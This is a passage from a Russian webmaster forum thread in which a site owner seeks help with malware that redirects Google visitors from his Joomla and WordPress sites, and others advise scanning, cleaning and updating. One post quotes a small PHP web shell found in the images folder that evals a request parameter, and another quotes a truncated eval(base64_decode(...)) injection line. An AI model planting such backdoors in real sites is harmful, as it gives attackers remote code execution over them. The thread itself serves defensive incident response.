Форум Сайтостроение Веб-строительство

Вирус на сайте, с гугла переправляет на сторонние сайты

1 234 5
6666
На сайте с 10.01.2005
Offline
505
6666
#21

Напомню ТС, что все действия по уничтожению вируса проводятся одновременно со всеми сайтами на хостинге. Иначе все начнется по кругу. Со всеми сайтами, не зависимо от движков. Мне подобную фигню умудрились даже в статический хтмл вписать.

Но! При этом ищется дырка, через которую пролезла бяка. Скорее всего дырявый скрипт на одном из движков. Плюс, разумеется, меняйте все пароли.

Каждое мое сообщение проверила и одобрила Елена Летучая. (c) Для меня очень важно все что Вы говорите! (http://surrealism.ru/123.mp3) .
Хакеры активно эксплуатируют уязвимость «Играем в доктора»: неправильное О выборе оптимального подхода
S
На сайте с 08.09.2009
Offline
168
specc
#22

вот кусок Лог доступа:

77.87.44.103 - - [17/Jan/2013:01:44:09 +0200] "GET /administrator/index.php HTTP/1.0" 200 4974 "-" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.8.131 Version/11.10"

77.87.44.103 - - [17/Jan/2013:01:44:11 +0200] "POST /administrator/index.php HTTP/1.0" 200 5277 "http://sait.ru/administrator/index.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.8.131 Version/11.10"

77.87.44.103 - - [17/Jan/2013:01:44:28 +0200] "GET /administrator/index.php HTTP/1.0" 200 4974 "-" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.8.131 Version/11.10"

77.87.44.103 - - [17/Jan/2013:01:44:29 +0200] "POST /administrator/index.php HTTP/1.0" 200 5277 "http://sait.ru/administrator/index.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.8.131 Version/11.10"

77.87.44.103 - - [17/Jan/2013:01:44:46 +0200] "GET /administrator/index.php HTTP/1.0" 200 4974 "-" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.8.131 Version/11.10"

77.87.44.103 - - [17/Jan/2013:01:44:46 +0200] "POST /administrator/index.php HTTP/1.0" 200 5277 "http://sait.ru/administrator/index.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.8.131 Version/11.10"

77.87.44.103 - - [17/Jan/2013:01:45:04 +0200] "GET /administrator/index.php HTTP/1.0" 200 4974 "-" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.8.131 Version/11.10"

77.87.44.103 - - [17/Jan/2013:01:45:04 +0200] "POST /administrator/index.php HTTP/1.0" 200 5277 "http://sait.ru/administrator/index.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.8.131 Version/11.10"

77.87.44.103 - - [17/Jan/2013:01:45:23 +0200] "GET /administrator/index.php HTTP/1.0" 200 4974 "-" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.8.131 Version/11.10"

77.87.44.103 - - [17/Jan/2013:01:45:23 +0200] "POST /administrator/index.php HTTP/1.0" 200 5277 "http://sait.ru/administrator/index.php" "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.8.131 Version/11.10"

82.145.208.194 - - [17/Jan/2013:01:45:36 +0200] "GET /kak-vylechit/18/55-kak-vylechit-gerpes HTTP/1.0" 302 - "http://www.google.com.ua/url?sa=t&rct=j&q=%D0%BA%D0%B0%D0%BA%20%D0%BB%D0%B5%D1%87%D0%B8%D1%82%D1%8C%20%D0%B3%D0%B5%D1%80%D0%BF%D0%B5%D1%81%20%D0%B2%20%D0%BD%D0%BE%D1%81%D1%83&source=web&cd=9&ved=0CHAQFjAI&url=http%3A%2F%2Fsait.ru%2Fkak-vylechit%2F18%2F55-kak-vylechit-gerpes&ei=ijj3ULfYFYjwsgb2v4GICg&usg=AFQjCNHso3XlcdeC41eosRrAtKgEwZ49vQ&bvm=bv.41018144,d.Yms" "Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.12"

77.87.44.103 - -

Методика Н. Харина-И.Ашманова для Взлеты и падения 2012 Что ищут люди сегодня:
WebGomel
На сайте с 29.10.2011
Offline
78
WebGomel
#23
specc:
вот кусок Лог доступа:

Это не то, это брутфорс админки джумлы (перебор паролей). Во первых крайне желательно смотреть за тот день, когда "опять появилось", а во вторых - на всех сайтах.

Удалённый системный администратор ( https://remadmin.com )
S
На сайте с 08.09.2009
Offline
168
specc
#24
6666:
Напомню ТС, что все действия по уничтожению вируса проводятся одновременно со всеми сайтами на хостинге. Иначе все начнется по кругу. Со всеми сайтами, не зависимо от движков. Мне подобную фигню умудрились даже в статический хтмл вписать.
Но! При этом ищется дырка, через которую пролезла бяка. Скорее всего дырявый скрипт на одном из движков. Плюс, разумеется, меняйте все пароли.

я и хочу найти откуда взялось, 4 джумлы и один wp на хостинге, может вирус остается на хостинге когда удаляю все cms, а когда заливаю все файл заново, он их опять цепляет?

---------- Добавлено 17.01.2013 в 23:35 ----------

может этот кусок

Jan 17 03:29:43 s24 pure-ftpd: (sait@194.0.200.201) [INFO] Logout.

Jan 17 03:30:50 s24 pure-ftpd: (sait@194.0.200.201) [NOTICE] /sata2/home/users/sait/www//sait_wumen201301170229.zip uploaded (4958663 bytes, 14396.57KB/sec)

Jan 17 03:30:50 s24 pure-ftpd: (sait@194.0.200.201) [INFO] Logout.

Jan 17 03:44:39 s24 pure-ftpd: (sait@93.126.101.151) [NOTICE] Deleted /sata2/home/users/sait/www//www.sait.ru/.htaccess

Jan 17 03:44:39 s24 pure-ftpd: (sait@93.126.101.151) [NOTICE] Deleted /sata2/home/users/sait/www//www.sait.ru/a499f4ccdf6d1b6e96fcdd15e1b9bf51.txt

Jan 17 03:44:39 s24 pure-ftpd: (sait@93.126.101.151) [NOTICE] Deleted /sata2/home/users/sait/www//www.sait.ru/CHANGELOG.php

Jan 17 03:44:39 s24 pure-ftpd: (sait@93.126.101.151) [NOTICE] Deleted /sata2/home/users/sait/www//www.sait.ru/configuration.php

если нет то я уже не знаю что искать

---------- Добавлено 17.01.2013 в 23:49 ----------

marsh:
Компонент JCE стоит в joomla? В папке /images/stories/ есть файл story.php с кодом: 
<?php 

if (isset($_REQUEST['p1'])) {

   eval(stripslashes($_REQUEST['p1']));

} else {

   echo "djeu84m";

}

?>

на одном сайте нашел этот код

Спрашиваем и отвечаем по Домены .RU по 100 Старые СДЛ в ЯКа/Дмоз
6666
На сайте с 10.01.2005
Offline
505
6666
#25

specc, юзайте айболит. Мне очень помог. Более конкретно подсказать не могу, движки были совсем другие. Суть дырки была в том что юзер грузил джипеги с вирусами внутри и потом запускал их как пхп файл.

Одноклассники запускают денежные переводы Google учитывает ссылки из Поисковые подсказки Яндекса. Особенности
S
На сайте с 08.09.2009
Offline
168
specc
#26

посмотрел свои джумла сайты на других хостингах, та же история - с гугла переправляет на сторонние сайты

---------- Добавлено 18.01.2013 в 00:09 ----------

6666:
specc, юзайте айболит. Мне очень помог. Более конкретно подсказать не могу, движки были совсем другие. Суть дырки была в том что юзер грузил джипеги с вирусами внутри и потом запускал их как пхп файл.

запустил айболита, показывает во всех пшп фалах - <?php |eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTs

Merchant Center запустил функцию Facebook представил страницу памяти Во втором квартале 2013
6666
На сайте с 10.01.2005
Offline
505
6666
#27
specc:
запустил айболита, показывает во всех пшп фалах

Значит все и стирайте и заливайте чистые.

S
На сайте с 08.09.2009
Offline
168
specc
#28
6666:
Значит все и стирайте и заливайте чистые.

я вчера так и сделал, через время все опять с вирусами

WebGomel
На сайте с 29.10.2011
Offline
78
WebGomel
#29
specc:
я вчера так и сделал, через время все опять с вирусами
specc:

на одном сайте нашел этот код

А это там тоже сегодня появилось? Или оно там и было?

Файлы почистите (например регуляркой, код то везде одинаковый), или чистые залейте. А потом айболитом по всем сайтам пройдитесь - он покажет шеллы, их убейте. Напоследок обновитесь (не только джумлу, но и расширения и вордпресса тоже это касается). Вот и всё, и ничего больше не появится.

Яндекс обновил браузер для На Яндекс.Маркете появился фильтр В Метрике появилась сегментация
S
На сайте с 08.09.2009
Offline
168
specc
#30
WebGomel:
А это там тоже сегодня появилось? Или оно там и было?



Файлы почистите (например регуляркой, код то везде одинаковый), или чистые залейте. А потом айболитом по всем сайтам пройдитесь - он покажет шеллы, их убейте. Напоследок обновитесь (не только джумлу, но и расширения и вордпресса тоже это касается). Вот и всё, и ничего больше не появится.

это с другого хостинга сайт тоже на джумла есть и на WP и тоже все заражены

1 234 5

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий